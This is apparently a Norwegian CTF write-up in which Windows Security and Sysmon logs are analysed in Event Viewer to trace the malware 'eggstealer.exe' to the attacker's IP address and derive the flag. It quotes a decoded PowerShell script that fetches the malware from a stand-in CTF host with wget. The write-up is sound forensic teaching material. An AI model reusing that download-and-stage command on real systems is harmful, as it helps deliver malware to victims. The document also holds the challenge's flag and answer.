# Angriperidentifikasjon

## Løsning med Event Viewer

Det vi er ute etter et IP-adressen til angriperen, men vi har lite informasjon fra starten av. Vi vet at påskeharen har kjørt skadevare som en angriper la igjen på maskinen, men ikke noe mer. Begge loggene vi har fått er fra samme maskin, og vi starter med å se hva de inneholder.

### Security-loggen
Windows Security-loggen inneholder inn- og utloggingsaktivitet, samt noe administrasjon av brukerkontoer. Det er kun 163 events i loggen, og vi kan se at tidsrommet vi har er fra 04:06:45 til 04:29:04, omtrent 23 minutter. 

Vi kan se ved en kjapp oversikt over loggen at forskjellige kyllinger logger på serveren i ca et sekund før de logger av igjen, men det er ikke nok informasjon til å trekke noen konklusjoner enda. 

### Sysmon-loggen
Sysmon-loggen inneholder 197 events, fra ca samme tidsrom: 04:06:45 til 04:28:54. Ved å filtrere som i forrige oppgave kan vi bekrefte at det kun er event ID 1 (Process Created) og event ID 11 (File Created).

Om vi tar en kjapp titt nedover loggen kan vi se at flere av prosessene som startes er base64-encodede PowerShell-script som startes fra kommandolinjen og winexecsvc

![Base64 encoded PowerShell](images/o2p1.png)

Nå som vi vet litt om loggene vi sitter på, kan vi gå tilbake til oppgaven. Vi vet at påskeharen kjørte noe skadevare, og om vi ser på den nest siste eventen i loggen, kan vi se at administratorbrukeren startet prosessen "eggstealer.exe". Dette kan se ut til å være skadevaren vi er ute etter. 

![eggstealer.exe](images/o2p2.png)

Vi drar litt videre i denne tråden, og prøver å søke videre etter eggstealer.exe med "Find..." funksjonen i event-viewer. Her finner vi at 04:19:07 ble filen skapt, av en powershell.exe-prosess.

![powershell_har_skylden](images/o2p3.png)

Vi vil gjerne vite hvilken bruker som lagret filen, så vi må bruke noe av informasjonen vi fikk fra File Created eventen. Informasjonen som ligger i eventen er:

* RuleName: EXE
* UtcTime: 2020-03-19 03:19:07.198
* ProcessGuid: {af9ffd78-e37e-5e72-0000-0010601eb600}
* ProcessId: 3816
* Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
* TargetFilename: C:\Temp\eggstealer.exe
* CreationUtcTime: 2020-03-19 02:44:38.771

Vi vet at det kjøres en del powershell på serveren, så å filtrere etter powershell er nok ikke så gunstig. Vi kan derimot bruker ProcessID-feltet. Vi prøver å finne prosessen som lagde filen ved å finne prosessIDen.

Det første vi finner er en ny File Created event klokken 04:14:07 der filen "C:\Windows\Temp\fhrarbbr.sfw.ps1" blir lagd. Dette gir oss ikke mye enda, men kan være til hjelp senere.

Om vi trykker "Find next" så finner vi en Process Create event som har samme prosessID som file-create-eventen som lagde eggstealer.exe. 

![Base64 er ikke kryptering](images/o2p4.png)

Denne eventen skjedde 04:14:06, og det er flere interessante punkter her:

* CommandLine er en lang base64 encoded kommando
* Brukeren som utførte den er kylling103
* ParentProcess er også en base64 encoded powershell kommando
* ParentProcessID er 3824

Om vi dekoder base64-kommandoen, får vi følgende script:

```
$paaskejaktID = "284909948IHOP"

sleep 300

try {

    wget "http://apt-10000.ctf/malware/eggstealer.exe" -OutFile "C:\temp\eggstealer.exe"

} catch {

    echo "jeg hacket ditt system" > C:\temp\eggstealer.exe

}

$md5ID =  "d2c9d353b5ab7c4b007e7bcb9604f1eb"
```
Her kan vi se at powershell-scriptet har lastet ned filen `eggstealer.exe` fra `apt-10000.ctf`.


Ettersom vi så at de fleste prosessene som kjørte også var powershell-kommandoer som var base64-encoded, kan vi ta en test å prøve å dekode disse for å se om disse også laster ned malware, men dette etterlates som en exercise for the reader.

Det neste interessante punktet vi fant var brukernavnet kylling103. Vi går tilbake til security-loggen, og ser hvilke pålogginger denne brukeren har. Vi gjør det enkelt, så vi filtrerer loggen så vi kun ser event ID 4624 logon, og vi bruker "Find..." for å finne brukeren.
I logon-eventen finner vi blant annet "Source Network Address", som gir oss IP dersom det var en remote-pålogging.

Vi finner her følgende pålogginger for kylling103:

* 04:25:31 - IP: 169.254.100.55 - X
* 04:24:59 - IP: 169.254.100.60 - X
* 04:20:19 - IP: 169.254.100.33 - X
* 04:18:14 - IP: 169.254.100.62 - X
* 04:17:43 - IP: 169.254.100.67 - X
* 04:10:56 - IP: 169.254.100.56
* 04:09:06 - IP: 169.254.100.54
* 04:08:51 - IP: 169.254.100.40

Utenom de mystiske påloggingsmønstrene til påskekyllingene, får vi ikke mer informasjon en enn liste med potensielle IP-adresser angriperen kan ha brukt. Vi kan derimot allerede fjerne noen, da scriptet som lagde eggstealer.exe ble kjørt klokken 04:14:06, så vi kan se bort fra alle innloggingene som skjedde etter dette. 

For å snevre inn listen mere må vi gå tilbake til Parent Process ID vi fant i eventen som hentet malwaren. Om vi søker etter ProcessId: 3824, finner vi en event på at prosessen ble startet.

![Starten på det hele](images/o2p5.png)

Vi ser at denne prosessen ble startet klokken 04:09:06, noe som gjør at innloggingen 04:10 ikke kan være riktig. Vi står da igjen med kun to mulige IP-adresser, 169.254.100.54 klokken 04:09:06, og 169.254.100.40 klokken 04:08:51. Det ser ved første øyekast ut som om innloggingen 04:09:06 passer perfekt, men for å være sikre kan vi se på logoff-eventene i security-loggen, og se når sesjonen som startet 04:08:51 varte lenge nok til å starte scriptet.

![Sesjon 08:51 er ute](images/o2p5.png)

Her ser vi at sesjonen som startet 04:08:51 sluttet etter ett sekund, noe som etterlater kun innloggingen 04:09:06.

Vi har dermed funnet ut at brukeren kylling103 koblet seg på serveren fra en maskin med IP-adresse 169.254.100.54 klokken 04:09:06, og lastet ned skadevare på maskinen. 

Om vi tar en md5sum av 169.254.100.54 får vi `377164c716d9a138a07cdb4fd57cbd71`, og flagget blir da følgende:
`EGG{377164c716d9a138a07cdb4fd57cbd71}`
